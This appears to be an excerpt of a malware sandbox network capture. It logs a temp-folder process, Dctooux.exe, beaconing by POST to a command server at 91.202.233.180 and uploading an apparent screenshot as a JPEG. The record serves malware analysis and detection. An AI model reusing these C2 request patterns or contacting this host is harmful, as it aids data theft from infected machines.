Apr 14, 2024 08:45:43.792207956 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792207956 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792258024 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792258024 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792309046 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792309046 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792356014 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792356014 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792395115 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792395115 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792437077 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792437077 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792475939 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792475939 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792514086 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792515039 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792550087 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792550087 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792587996 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792587996 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792629004 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792629004 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792666912 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792666912 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792710066 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792710066 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792747021 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792747021 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792787075 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792787075 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792828083 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792828083 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792875051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792875051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792915106 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792915106 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792967081 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.792967081 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793013096 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793014050 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793070078 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793070078 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793109894 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793109894 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793148041 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793148041 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793184996 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793184996 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793222904 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793222904 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793267012 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793267012 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793317080 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793317080 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793361902 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793361902 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793411016 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793411016 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793450117 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793450117 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793488026 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793488026 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793526888 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793526888 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793565989 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793565989 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793605089 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793605089 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793646097 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793646097 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793683052 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793683052 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793719053 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793720007 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793760061 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793760061 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793797016 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793797016 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793836117 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793836117 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793880939 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793880939 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793930054 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793930054 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793971062 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.793971062 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794015884 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794015884 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794061899 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794061899 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794107914 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794107914 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794159889 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794159889 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794204950 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794204950 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794244051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794244051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794285059 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794285059 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794322014 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794322968 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794372082 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794372082 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794410944 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794410944 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794460058 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794460058 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794511080 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794511080 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794553041 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794553041 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794617891 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794617891 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794661999 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794661999 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794698954 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794698954 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794739008 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794739008 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794774055 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794774055 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794816971 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794816971 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794859886 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794859886 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794899940 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794899940 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794934988 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794934988 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794975996 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.794975996 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795022011 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795022011 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795064926 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795066118 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795113087 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795113087 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795162916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795162916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795213938 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795213938 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795255899 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795255899 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795295000 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795295000 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795332909 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795332909 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795370102 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795370102 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795418978 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795418978 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795464993 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795464993 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795515060 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795515060 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795557976 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795557976 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795594931 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795594931 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795630932 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795630932 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795660019 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795689106 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795689106 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795727015 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795727015 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795769930 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795769930 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795806885 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795806885 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795845032 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795845032 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795888901 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795888901 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795928001 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795928001 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795962095 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.795962095 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.796000004 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.796000004 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.796035051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.796035051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.796076059 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.796076059 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.796112061 CEST	49743	80	192.168.2.4	91.202.233.180

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 14, 2024 08:44:19.809504032 CEST	192.168.2.4	1.1.1.1	0xf891	Standard query (0)	hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 14, 2024 08:44:19.965287924 CEST	1.1.1.1	192.168.2.4	0xf891	Name error (3)	hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:41.973536015 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:42.308374882 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:42.318344116 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:42.655458927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:42.049159050 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODYzOTI= Host: 91.202.233.180 Content-Length: 86544 Cache-Control: no-cache
Apr 14, 2024 08:45:42.049246073 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 59 7a 4f 54 49 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODYzOTI=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:45:42.049292088 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:45:42.049325943 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:45:42.049344063 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:45:42.049393892 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:45:42.049393892 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:45:42.049417019 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:45:42.049439907 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:45:42.049465895 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:45:42.049489975 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:45:43.155436993 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:43.101675987 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:43.435758114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:43.436532974 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:43.777076006 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:43.758629084 CEST	173	OUT	POST /g88sks2SaM/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODkwNDc= Host: 91.202.233.180 Content-Length: 89199 Cache-Control: no-cache
Apr 14, 2024 08:45:43.758629084 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 6b 77 4e 44 63 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODkwNDc=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Apr 14, 2024 08:45:43.758682013 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Apr 14, 2024 08:45:43.758682013 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Apr 14, 2024 08:45:43.758860111 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Apr 14, 2024 08:45:43.758860111 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Apr 14, 2024 08:45:43.758860111 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Apr 14, 2024 08:45:43.758860111 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Apr 14, 2024 08:45:43.758860111 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Apr 14, 2024 08:45:43.758860111 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Apr 14, 2024 08:45:43.758908987 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Apr 14, 2024 08:45:46.109644890 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:44.242187977 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Apr 14, 2024 08:45:44.582851887 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Apr 14, 2024 08:45:44.585344076 CEST	310	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Apr 14, 2024 08:45:44.930305004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 14 Apr 2024 06:45:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	91.202.233.180	80	1456	C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe

Timestamp	Bytes transferred	Direction	Data
Apr 14, 2024 08:45:45.377917051 CEST	158	OUT	POST /g88sks2SaM/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 91.202.233.180 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
